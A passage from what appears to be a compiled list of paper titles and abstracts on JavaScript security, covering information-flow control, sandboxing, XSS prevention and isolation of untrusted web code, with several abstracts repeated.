instrumentation. Untrusted JavaScript code goes through a rewriting process which identifies relevant operations, modifies questionable behaviors, and prompts the user (a web page viewer) for decisions on how to proceed when appropriate. Our solution is parametric with respect to the security policy-the policy is implemented separately from the rewriting, and the same rewriting process is carried out regardless of which policy is in use. Be-sides providing a rigorous account of the correctness of our solution, we also discuss practical issues including policy management and prototype experiments. A useful by-product of our work is an operational semantics of a core subset of JavaScript, where code embedded in (HTML) documents may generate further document pieces (with new code embedded) at runtime, yielding a form of self-modifying code. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for an approximate static analyses while still guaranteeing non-interference. We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: Lightweight self-protecting JavaScript paper_content: This paper introduces a method to control JavaScript execution. The aim is to prevent or modify inappropriate behaviour caused by e.g. malicious injected scripts or poorly designed third-party code. The approach is based on modifying the code so as to make it self-protecting: the protection mechanism (security policy) is embedded into the code itself and intercepts security relevant API calls. The challenges come from the nature of the JavaScript language: any variables in the scope of the program can be redefined, and code can be created and run on-the-fly. This creates potential problems, respectively, for tamper-proofing the protection mechanism, and for ensuring that no security relevant events bypass the protection. Unlike previous approaches to instrument and monitor JavaScript to enforce or adjust behaviour, the solution we propose is lightweight in that (i) it does not require a modified browser, and (ii) it does not require any run-time parsing and transformation of code (including dynamically generated code). As a result, the method has low run-time overhead compared to other methods satisfying (i), and the lack of need for browser modifications means that the policy can even be applied on the server to mitigate some effects of cross-site scripting bugs. --- paper_title: Information-Flow Security for a Core of JavaScript paper_content: Tracking information flow in dynamic languages remains an important and intricate problem. This paper makes substantial headway toward understanding the main challenges and resolving them. We identify language constructs that constitute a core of Java Script: objects, higher-order functions, exceptions, and dynamic code evaluation. The core is powerful enough to naturally encode native constructs as arrays, as well as functionalities of Java Script's API from the document object model (DOM) related to document tree manipulation and event processing. As the main contribution, we develop a dynamic type system that guarantees information-flow security for this language. --- paper_title: FlowFox: a web browser with flexible and precise information flow control paper_content: We present FlowFox, the first fully functional web browser that implements a precise and general information flow control mechanism for web scripts based on the technique of secure multi-execution. We demonstrate how FlowFox subsumes many ad-hoc script containment countermeasures developed over the last years. We also show that FlowFox is compatible with the current web, by investigating its behavior on the Alexa top-500 web sites, many of which make intricate use of JavaScript. The performance and memory cost of FlowFox is substantial (a performance cost of around 20% on macro benchmarks for a simple two level policy), but not prohibitive. Our prototype implementation shows that information flow enforcement based on secure multi-execution can be implemented in full-scale browsers. It can support powerful, yet precise policies refining the same-origin-policy in a way that is compatible with existing websites. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: Permissive dynamic information flow analysis paper_content: A key challenge in dynamic information flow analysis is handling implicit flows, where code conditional on a private variable updates a public variable x. The naive approach of upgrading x to private results in x being partially leaked, where its value contains private data but its label might remain public on an alternative execution (where the conditional update was not performed). Prior work proposed the no-sensitive-upgrade check, which handles implicit flows by prohibiting partially leaked data, but attempts to update a public variable from a private context causes execution to get stuck. To overcome this limitation, we develop a sound yet flexible permissive-upgrade strategy. To prevent information leaks, partially leaked data is permitted but carefully tracked to ensure that it is never totally leaked. This permissive-upgrade strategy is more flexible than the prior approaches such as the no-sensitive-upgrade check. Under the permissive-upgrade strategy, partially leaked data must be marked as private before being used in a conditional test, thereby ensuring that it is private for both the current execution as well as alternate execution paths. This paper also presents a dynamic analysis technique for inferring these privatization operations and inserting them into the program source code. The combination of these techniques allows more programs to run to completion, while still guaranteeing termination-insensitive non-interference in a purely dynamic manner. --- paper_title: JavaScript instrumentation for browser security paper_content: It is well recognized that JavaScript can be exploited to launch browser-based security attacks. We propose to battle such attacks using program instrumentation. Untrusted JavaScript code goes through a rewriting process which identifies relevant operations, modifies questionable behaviors, and prompts the user (a web page viewer) for decisions on how to proceed when appropriate. Our solution is parametric with respect to the security policy-the policy is implemented separately from the rewriting, and the same rewriting process is carried out regardless of which policy is in use. Be-sides providing a rigorous account of the correctness of our solution, we also discuss practical issues including policy management and prototype experiments. A useful by-product of our work is an operational semantics of a core subset of JavaScript, where code embedded in (HTML) documents may generate further document pieces (with new code embedded) at runtime, yielding a form of self-modifying code. --- paper_title: ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser paper_content: Much of the power of modern Web comes from the ability of a Web page to combine content and JavaScript code from disparate servers on the same page. While the ability to create such mash-ups is attractive for both the user and the developer because of extra functionality, code inclusion effectively opens the hosting site up for attacks and poor programming practices within every JavaScript library or API it chooses to use. In other words, expressiveness comes at the price of losing control. To regain the control, it is therefore valuable to provide means for the hosting page to restrict the behavior of the code that the page may include. This paper presents ConScript, a client-side advice implementation for security, built on top of Internet Explorer 8. ConScript allows the hosting page to express fine-grained application-specific security policies that are enforced at runtime. In addition to presenting 17 widely-ranging security and reliability policies that ConScript enables, we also show how policies can be generated automatically through static analysis of server-side code or runtime analysis of client-side code. We also present a type system that helps ensure correctness of ConScript policies. To show the practicality of ConScript in a range of settings, we compare the overhead of ConScript enforcement and conclude that it is significantly lower than that of other systems proposed in the literature, both on micro-benchmarks as well as large, widely-used applications such as MSN, GMail, Google Maps, and Live Desktop. --- paper_title: Multiple facets for dynamic information flow paper_content: JavaScript has become a central technology of the web, but it is also the source of many security problems, including cross-site scripting attacks and malicious advertising code. Central to these problems is the fact that code from untrusted sources runs with full privileges. We implement information flow controls in Firefox to help prevent violations of data confidentiality and integrity. Most previous information flow techniques have primarily relied on either static type systems, which are a poor fit for JavaScript, or on dynamic analyses that sometimes get stuck due to problematic implicit flows, even in situations where the target web application correctly satisfies the desired security policy. We introduce faceted values, a new mechanism for providing information flow security in a dynamic manner that overcomes these limitations. Taking inspiration from secure multi-execution, we use faceted values to simultaneously and efficiently simulate multiple executions for different security levels, thus providing non-interference with minimal overhead, and without the reliance on the stuck executions of prior dynamic approaches. --- paper_title: Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis paper_content: Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application. --- paper_title: Detecting malicious JavaScript code in Mozilla paper_content: The JavaScript language is used to enhance the client-side display of web pages. JavaScript code is downloaded into browsers and executed on-the-fly by an embedded interpreter. Browsers provide sand-boxing mechanisms to prevent JavaScript code from compromising the security of the client's environment, but, unfortunately, a number of attacks exist that can be used to steal users' credentials (e.g., cross-site scripting attacks) and lure users into providing sensitive information to unauthorized parties (e.g., phishing attacks). We propose an approach to solve this problem that is based on monitoring JavaScript code execution and comparing the execution to high-level policies, to detect malicious code behavior. To achieve this goal it is necessary to provide a mechanism to audit the execution of JavaScript code. This is a difficult task, because of the close integration of JavaScript with complex browser applications, such as Mozilla. This paper presents the first existing implementation of an auditing system for JavaScript interpreters and discusses the pitfalls and lessons learned in developing the auditing mechanism. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for an approximate static analyses while still guaranteeing non-interference. We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: Permissive dynamic information flow analysis paper_content: A key challenge in dynamic information flow analysis is handling implicit flows, where code conditional on a private variable updates a public variable x. The naive approach of upgrading x to private results in x being partially leaked, where its value contains private data but its label might remain public on an alternative execution (where the conditional update was not performed). Prior work proposed the no-sensitive-upgrade check, which handles implicit flows by prohibiting partially leaked data, but attempts to update a public variable from a private context causes execution to get stuck. To overcome this limitation, we develop a sound yet flexible permissive-upgrade strategy. To prevent information leaks, partially leaked data is permitted but carefully tracked to ensure that it is never totally leaked. This permissive-upgrade strategy is more flexible than the prior approaches such as the no-sensitive-upgrade check. Under the permissive-upgrade strategy, partially leaked data must be marked as private before being used in a conditional test, thereby ensuring that it is private for both the current execution as well as alternate execution paths. This paper also presents a dynamic analysis technique for inferring these privatization operations and inserting them into the program source code. The combination of these techniques allows more programs to run to completion, while still guaranteeing termination-insensitive non-interference in a purely dynamic manner. --- paper_title: A Sound Type System For Secure Flow Analysis paper_content: Ensuring secure information flow within programs in the context of multiple sensitivity levels has been widely studied. Especially noteworthy is Denning’s work in secure flow analysis and the lattice model [6][7]. Until now, however, the soundness of Denning’s analysis has not been established satisfactorily. We formulate Denning’s approach as a type system and present a notion of soundness for the system that can be viewed as a form of noninterference. Soundness is established by proving, with respect to a standard programming language semantics, that all well-typed programs have this noninterference property. --- paper_title: Certification of programs for secure information flow paper_content: ertification mechanism for verifying the secure flow of information through a program. Because it exploits the properties of a lattice structure among security classes, the procedure is sufficiently simple that it can easily be included in the analysis phase of most existing compilers. Appropriate semantics are presented and proved correct. An important application is the confinement problem: The mechanism can prove that a program cannot cause supposedly nonconfidential results to depend on confidential input data. --- paper_title: Confidentiality Enforcement Using Dynamic Information Flow Analyses paper_content: With the intensification of communication in information systems, interest in security has increased. The notion of noninterference is typically used as a baseline security policy to formalize confidentiality of secret information manipulated by a program. This notion, based on ideas from classical information theory, has first been introduced by Goguen and Meseguer (1982) as the absence of strong dependency (Cohen, 1977). "information is transmitted from a source to a destination only when variety in the source can be conveyed to the destination" Cohen (1977) Building on the notion proposed by Goguen and Meseguer, a program is typically said to be noninterfering if the values of its public outputs do not depend on the values of its secret inputs. If that is not the case then there exist illegal information flows that allow an attacker, having knowledge about the source code of the program, to deduce information about the secret inputs from the public outputs of the execution. ::: In contrast to the vast majority of previous work on noninterference which are based on static analyses (especially type systems), this PhD thesis report considers dynamic monitoring of noninterference. A monitor enforcing noninterference is more complex than standard execution monitors. "the information carried by a particular message depends on the set it comes from. The information conveyed is not an intrinsic property of the individual message." Ashby (1956) The work presented in this report is based on the combination of dynamic and static information flow analyses. The practicality of such an approach is demonstrated by the development of a monitor for concurrent programs including synchronization commands. This report also elaborates on the soundness with regard to noninterference and precision of such approaches. --- paper_title: Dynamic vs. Static Flow-Sensitive Security Analysis paper_content: This paper seeks to answer fundamental questions about trade-offs between static and dynamic security analysis. It has been previously shown that flow-sensitive static information-flow analysis is a natural generalization of flow-insensitive static analysis, which allows accepting more secure programs. It has been also shown that sound purely dynamic information-flow enforcement is more permissive than static analysis in the flow-insensitive case. We argue that the step from flow-insensitive to flow-sensitive is fundamentally limited for purely dynamic information-flow controls. We prove impossibility of a sound purely dynamic information-flow monitor that accepts programs certified by a classical flow-sensitive static analysis. A side implication is impossibility of permissive dynamic instrumented security semantics for information flow, which guides us to uncover an unsound semantics from the literature. We present a general framework for hybrid mechanisms that is parameterized in the static part and in the reaction method of the enforcement (stop, suppress, or rewrite) and give security guarantees with respect to termination-insensitive noninterference for a simple language with output. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: From dynamic to static and back: Riding the roller coaster of information-flow control research paper_content: Historically, dynamic techniques are the pioneers of the area of information flow in the 70's. In their seminal work, Denning and Denning suggest a static alternative for information-flow analysis. Following this work, the 90's see the domination of static techniques for information flow. The common wisdom appears to be that dynamic approaches are not a good match for security since monitoring a single path misses public side effects that could have happened in other paths. Dynamic techniques for information flow are on the rise again, driven by the need for permissiveness in today's dynamic applications. But they still involve nontrivial static checks for leaks related to control flow. ::: ::: This paper demonstrates that it is possible for a purely dynamic enforcement to be as secure as Denning-style static information-flow analysis, despite the common wisdom. We do have the trade-off that static techniques have benefits of reducing runtime overhead, and dynamic techniques have the benefits of permissiveness (this, for example, is of particular importance in dynamic applications, where freshly generated code is evaluated). But on the security side, we show for a simple imperative language that both Denning-style analysis and dynamic enforcement have the same assurance: termination-insensitive noninterference. --- paper_title: On flow-sensitive security types paper_content: This article investigates formal properties of a family of semantically sound flow-sensitive type systems for tracking information flow in simple While programs. The family is indexed by the choice of flow lattice.By choosing the flow lattice to be the powerset of program variables, we obtain a system which, in a very strong sense, subsumes all other systems in the family (in particular, for each program, it provides a principal typing from which all others may be inferred). This distinguished system is shown to be equivalent to, though more simply described than, Amtoft and Banerjee's Hoare-style independence logic (SAS'04).In general, some lattices are more expressive than others. Despite this, we show that no type system in the family can give better results for a given choice of lattice than the type system for that lattice itself.Finally, for any program typeable in one of these systems, we show how to construct an equivalent program which is typeable in a simple flow-insensitive system. We argue that this general approach could be useful in a proof-carrying-code setting. --- paper_title: Multiple facets for dynamic information flow paper_content: JavaScript has become a central technology of the web, but it is also the source of many security problems, including cross-site scripting attacks and malicious advertising code. Central to these problems is the fact that code from untrusted sources runs with full privileges. We implement information flow controls in Firefox to help prevent violations of data confidentiality and integrity. Most previous information flow techniques have primarily relied on either static type systems, which are a poor fit for JavaScript, or on dynamic analyses that sometimes get stuck due to problematic implicit flows, even in situations where the target web application correctly satisfies the desired security policy. We introduce faceted values, a new mechanism for providing information flow security in a dynamic manner that overcomes these limitations. Taking inspiration from secure multi-execution, we use faceted values to simultaneously and efficiently simulate multiple executions for different security levels, thus providing non-interference with minimal overhead, and without the reliance on the stuck executions of prior dynamic approaches. --- paper_title: Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis paper_content: Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application. --- paper_title: Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis paper_content: Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: Mash-IF: Practical information-flow control within client-side mashups paper_content: Mashup is a representative of Web 2.0 technology that needs both convenience of cross-domain access and protection against the security risks it brings in. Solutions proposed by prior research focused on mediating access to the data in different domains, but little has been done to control the use of the data after the access. In this paper, we present Mash-IF, a new technique for information-flow control within mashups. Our approach allows cross-domain communications within a browser, but disallows disclosure of sensitive information to remote parties without the user's permission. It mediates the cross-domain channels in existing mashups and works on the client without collaborations from other parties. Also of particular interest is a novel technique that automatically generates declassification rules for a script by statically analyzing its code. Such rules can be efficiently enforced through monitoring the script's call sequences and DOM operations. --- paper_title: GATEKEEPER: Mostly Static Enforcement of Security and Reliability Policies for JavaScript Code paper_content: The advent of Web 2.0 has lead to the proliferation of client-side code that is typically written in JavaScript. This code is often combined -- or mashed-up -- with other code and content from disparate, mutually untrusting parties, leading to undesirable security and reliability consequences. ::: ::: This paper proposes GATEKEEPER, a mostly static approach for soundly enforcing security and reliability policies for JavaScript programs. GATEKEEPER is a highly extensible system with a rich, expressive policy language, allowing the hosting site administrator to formulate their policies as succinct Datalog queries. ::: ::: The primary application of GATEKEEPER this paper explores is in reasoning about JavaScript widgets such as those hosted by widget portals Live.com and Google/IG. Widgets submitted to these sites can be either malicious or just buggy and poorly written, and the hosting site has the authority to reject the submission of widgets that do not meet the site's security policies. ::: ::: To show the practicality of our approach, we describe nine representative security and reliability policies. Statically checking these policies results in 1,341 verified warnings in 684 widgets, no false negatives, due to the soundness of our analysis, and false positives affecting only two widgets. --- paper_title: Reactive non-interference for a browser model paper_content: We investigate non-interference (secure information flow) policies for web browsers, replacing or complementing the Same Origin Policy. First, we adapt a recently proposed dynamic information flow enforcement mechanism to support asynchronous I/O. We prove detailed security and precision results for this enforcement mechanism, and implement it for the Featherweight Firefox browser model. Second, we investigate three useful web browser security policies that can be enforced by our mechanism, and demonstrate their value and limitations. --- paper_title: FlowFox: a web browser with flexible and precise information flow control paper_content: We present FlowFox, the first fully functional web browser that implements a precise and general information flow control mechanism for web scripts based on the technique of secure multi-execution. We demonstrate how FlowFox subsumes many ad-hoc script containment countermeasures developed over the last years. We also show that FlowFox is compatible with the current web, by investigating its behavior on the Alexa top-500 web sites, many of which make intricate use of JavaScript. The performance and memory cost of FlowFox is substantial (a performance cost of around 20% on macro benchmarks for a simple two level policy), but not prohibitive. Our prototype implementation shows that information flow enforcement based on secure multi-execution can be implemented in full-scale browsers. It can support powerful, yet precise policies refining the same-origin-policy in a way that is compatible with existing websites. --- paper_title: AdJail: Practical Enforcement of Confidentiality and Integrity Policies on Web Advertisements paper_content: Web publishers frequently integrate third-party advertisements into web pages that also contain sensitive publisher data and end-user personal data. This practice exposes sensitive page content to confidentiality and integrity attacks launched by advertisements. In this paper, we propose a novel framework for addressing security threats posed by third-party advertisements. The heart of our framework is an innovative isolation mechanism that enables publishers to transparently interpose between advertisements and end users. The mechanism supports finegrained policy specification and enforcement, and does not affect the user experience of interactive ads. Evaluation of our framework suggests compatibility with several mainstream ad networks, security from many threats from advertisements and acceptable performance overheads. --- paper_title: Featherweight Firefox Formalizing the Core of a Web Browser paper_content: We offer a formal specification of the core functionality of a web browser in the form of a small-step operational semantics. The specification accurately models the asynchronous nature of web browsers and covers the basic aspects of windows, DOM trees, cookies, HTTP requests and responses, user input, and a minimal scripting language with first-class functions, dynamic evaluation, and AJAX requests. No security enforcement mechanisms are included--instead, the model is intended to serve as a basis for formalizing and experimenting with different security policies and mechanisms. We survey the most interesting design choices and discuss how our model relates to real web browsers. --- paper_title: Multiple facets for dynamic information flow paper_content: JavaScript has become a central technology of the web, but it is also the source of many security problems, including cross-site scripting attacks and malicious advertising code. Central to these problems is the fact that code from untrusted sources runs with full privileges. We implement information flow controls in Firefox to help prevent violations of data confidentiality and integrity. Most previous information flow techniques have primarily relied on either static type systems, which are a poor fit for JavaScript, or on dynamic analyses that sometimes get stuck due to problematic implicit flows, even in situations where the target web application correctly satisfies the desired security policy. We introduce faceted values, a new mechanism for providing information flow security in a dynamic manner that overcomes these limitations. Taking inspiration from secure multi-execution, we use faceted values to simultaneously and efficiently simulate multiple executions for different security levels, thus providing non-interference with minimal overhead, and without the reliance on the stuck executions of prior dynamic approaches. --- paper_title: Efficient purely-dynamic information flow analysis paper_content: We present a novel approach for efficiently tracking information flow in a dynamically-typed language such as JavaScript. Our approach is purely dynamic, and it detects problems with implicit paths via a dynamic check that avoids the need for an approximate static analyses while still guaranteeing non-interference. We incorporate this check into an efficient evaluation strategy based on sparse information labeling that leaves information flow labels implicit whenever possible, and introduces explicit labels only for values that migrate between security domains. We present experimental results showing that, on a range of small benchmark programs, sparse labeling provides a substantial (30%-50%) speed-up over universal labeling. --- paper_title: Information-Flow Security for a Core of JavaScript paper_content: Tracking information flow in dynamic languages remains an important and intricate problem. This paper makes substantial headway toward understanding the main challenges and resolving them. We identify language constructs that constitute a core of Java Script: objects, higher-order functions, exceptions, and dynamic code evaluation. The core is powerful enough to naturally encode native constructs as arrays, as well as functionalities of Java Script's API from the document object model (DOM) related to document tree manipulation and event processing. As the main contribution, we develop a dynamic type system that guarantees information-flow security for this language. --- paper_title: Staged information flow for javascript paper_content: Modern websites are powered by JavaScript, a flexible dynamic scripting language that executes in client browsers. A common paradigm in such websites is to include third-party JavaScript code in the form of libraries or advertisements. If this code were malicious, it could read sensitive information from the page or write to the location bar, thus redirecting the user to a malicious page, from which the entire machine could be compromised. We present an information-flow based approach for inferring the effects that a piece of JavaScript has on the website in order to ensure that key security properties are not violated. To handle dynamically loaded and generated JavaScript, we propose a framework for staging information flow properties. Our framework propagates information flow through the currently known code in order to compute a minimal set of syntactic residual checks that are performed on the remaining code when it is dynamically loaded. We have implemented a prototype framework for staging information flow. We describe our techniques for handling some difficult features of JavaScript and evaluate our system's performance on a variety of large real-world websites. Our experiments show that static information flow is feasible and efficient for JavaScript, and that our technique allows the enforcement of information-flow policies with almost no run-time overhead. --- paper_title: Using Datalog with Binary Decision Diagrams for Program Analysis paper_content: Many problems in program analysis can be expressed naturally and concisely in a declarative language like Datalog. This makes it easy to specify new analyses or extend or compose existing analyses. However, previous implementations of declarative languages perform poorly compared with traditional implementations. This paper describes bddbddb, a BDD-Based Deductive DataBase, which implements the declarative language Datalog with stratified negation, totally-ordered finite domains and comparison operators. bddbddb uses binary decision diagrams (BDDs) to efficiently represent large relations. BDD operations take time proportional to the size of the data structure, not the number of tuples in a relation, which leads to fast execution times. bddbddb is an effective tool for implementing a large class of program analyses. We show that a context-insensitive points-to analysis implemented with bddbddb is about twice as fast as a carefully hand-tuned version. The use of BDDs also allows us to solve heretofore unsolved problems, like context-sensitive pointer analysis for large programs. --- paper_title: GULFSTREAM: Staged Static Analysis for Streaming JavaScript Applications paper_content: The advent of Web 2.0 has led to the proliferation of client-side code that is typically written in JavaScript. Recently, there has been an upsurge of interest in static analysis of client-side JavaScript for applications such as bug finding and optimization. However, most approaches in static analysis literature assume that the entire program is available to analysis. This, however, is in direct contradiction with the nature of Web 2.0 programs that are essentially being streamed at the user's browser. Users can see data being streamed to pages in the form of page updates, but the same thing can be done with code, essentially delaying the downloading of code until it is needed. In essence, the entire program is never completely available. Interacting with the application causes more code to be sent to the browser. ::: ::: This paper explores staged static analysis as a way to analyze streaming JavaScript programs. We observe while there is variance in terms of the code that gets sent to the client, much of the code of a typical JavaScript application can be determined statically. As a result, we advocate the use of combined offline-online static analysis as a way to accomplish fast, browser-based client-side online analysis at the expense of a more thorough and costly server-based offline analysis on the static code. We find that in normal use, where updates to the code are small, we can update static analysis results quickly enough in the browser to be acceptable for everyday use. We demonstrate the staged analysis approach to be advantageous especially in mobile devices, by experimenting on popular applications such as Facebook. --- paper_title: GATEKEEPER: Mostly Static Enforcement of Security and Reliability Policies for JavaScript Code paper_content: The advent of Web 2.0 has lead to the proliferation of client-side code that is typically written in JavaScript. This code is often combined -- or mashed-up -- with other code and content from disparate, mutually untrusting parties, leading to undesirable security and reliability consequences. ::: ::: This paper proposes GATEKEEPER, a mostly static approach for soundly enforcing security and reliability policies for JavaScript programs. GATEKEEPER is a highly extensible system with a rich, expressive policy language, allowing the hosting site administrator to formulate their policies as succinct Datalog queries. ::: ::: The primary application of GATEKEEPER this paper explores is in reasoning about JavaScript widgets such as those hosted by widget portals Live.com and Google/IG. Widgets submitted to these sites can be either malicious or just buggy and poorly written, and the hosting site has the authority to reject the submission of widgets that do not meet the site's security policies. ::: ::: To show the practicality of our approach, we describe nine representative security and reliability policies. Statically checking these policies results in 1,341 verified warnings in 684 widgets, no false negatives, due to the soundness of our analysis, and false positives affecting only two widgets. --- paper_title: The Essence of JavaScript paper_content: We reduce JavaScript to a core calculus structured as a small-step operational semantics. We present several peculiarities of the language and show that our calculus models them. We explicate the desugaring process that turns JavaScript programs into ones in the core. We demonstrate faithfulness to JavaScript using real-world test suites. Finally, we illustrate utility by defining a security property, implementing it as a type system on the core, and extending it to the full language. --- paper_title: Object Capabilities and Isolation of Untrusted Web Applications paper_content: A growing number of current web sites combine active content (applications) from untrusted sources, as in so-called mashups. The object-capability model provides an appealing approach for isolating untrusted content: if separate applications are provided disjoint capabilities, a sound object-capability framework should prevent untrusted applications from interfering with each other, without preventing interaction with the user or the hosting page. In developing language-based foundations for isolation proofs based on object-capability concepts, we identify a more general notion of authority safety that also implies resource isolation. After proving that capability safety implies authority safety, we show the applicability of our framework for a specific class of mashups. In addition to proving that a JavaScript subset based on Google Caja is capability safe, we prove that a more expressive subset of JavaScript is authority safe, even though it is not based on the object-capability model. --- paper_title: Isolating JavaScript with filters, rewriting, and wrappers paper_content: We study methods that allow web sites to safely combine JavaScript from untrusted sources. If implemented properly, filters can prevent dangerous code from loading into the execution environment, while rewriting allows greater expressiveness by inserting run-time checks. ::: ::: Wrapping properties of the execution environment can prevent misuse without requiring changes to imported JavaScript. Using a formal semantics for the ECMA 262-3 standard language, we prove security properties of a subset of JavaScript, comparable in expressiveness to Facebook FBJS, obtained by combining three isolation mechanisms. The isolation guarantees of the three mechanisms are interdependent, with rewriting and wrapper functions relying on the absence of JavaScript constructs eliminated by language filters. --- paper_title: An operational semantics for javascript paper_content: We define a small-step operational semantics for the ECMAScript standard language corresponding to JavaScript, as a basis for analyzing security properties of web applications and mashups. The semantics is based on the language standard and a number of experiments with different implementations and browsers. Some basic properties of the semantics are proved, including a soundness theorem and a characterization of the reachable portion of the heap. --- paper_title: Language-Based Isolation of Untrusted JavaScript paper_content: Web sites that incorporate untrusted content may use browser- or language-based methods to keep such content from maliciously altering pages, stealing sensitive information, or causing other harm. We study language-based methods for filtering and rewriting JavaScript code, using Yahoo! ADSafe and Facebook FBJS as motivating examples. We explain the core problems by describing previously unknown vulnerabilities and subtleties, and develop a foundation for improved solutions based on an operational semantics of the full ECMA-262 language. We also discuss how to apply our analysis to address the JavaScript isolation problems we discovered. --- paper_title: ADsafety: Type-Based Verification of JavaScript Sandboxing paper_content: Web sites routinely incorporate JavaScript programs from several sources into a single page. These sources must be protected from one another, which requires robust sandboxing. The many entry-points of sandboxes and the subtleties of JavaScript demand robust verification of the actual sandbox source. We use a novel type system for JavaScript to encode and verify sandboxing properties. The resulting verifier is lightweight and efficient, and operates on actual source. We demonstrate the effectiveness of our technique by applying it to ADsafe, which revealed several bugs and other weaknesses. --- paper_title: Automated Analysis of Security-Critical JavaScript APIs paper_content: JavaScript is widely used to provide client-side functionality in Web applications. To provide services ranging from maps to advertisements, Web applications may incorporate untrusted JavaScript code from third parties. The trusted portion of each application may then expose an API to untrusted code, interposing a reference monitor that mediates access to security-critical resources. However, a JavaScript reference monitor can only be effective if it cannot be circumvented through programming tricks or programming language idiosyncrasies. In order to verify complete mediation of critical resources for applications of interest, we define the semantics of a restricted version of JavaScript devised by the ECMA Standards committee for isolation purposes, and develop and test an automated tool that can soundly establish that a given API cannot be circumvented or subverted. Our tool reveals a previously-undiscovered vulnerability in the widely-examined Yahoo! AD Safe filter and verifies confinement of the repaired filter and other examples from the Object-Capability literature. --- paper_title: Mashic Compiler: Mashup Sandboxing Based on Inter-frame Communication paper_content: Mashups are a prevailing kind of web applications integrating external gadget APIs often written in the JavaScript programming language. Writing secure mashups is a challenging task due to the heterogeneity of existing gadget APIs, the privileges granted to gadgets during mashup executions, and JavaScript's highly dynamic environment. We propose a new compiler , called Mashic, for the automatic generation of secure JavaScript-based mashups from existing mashup code. The Mashic 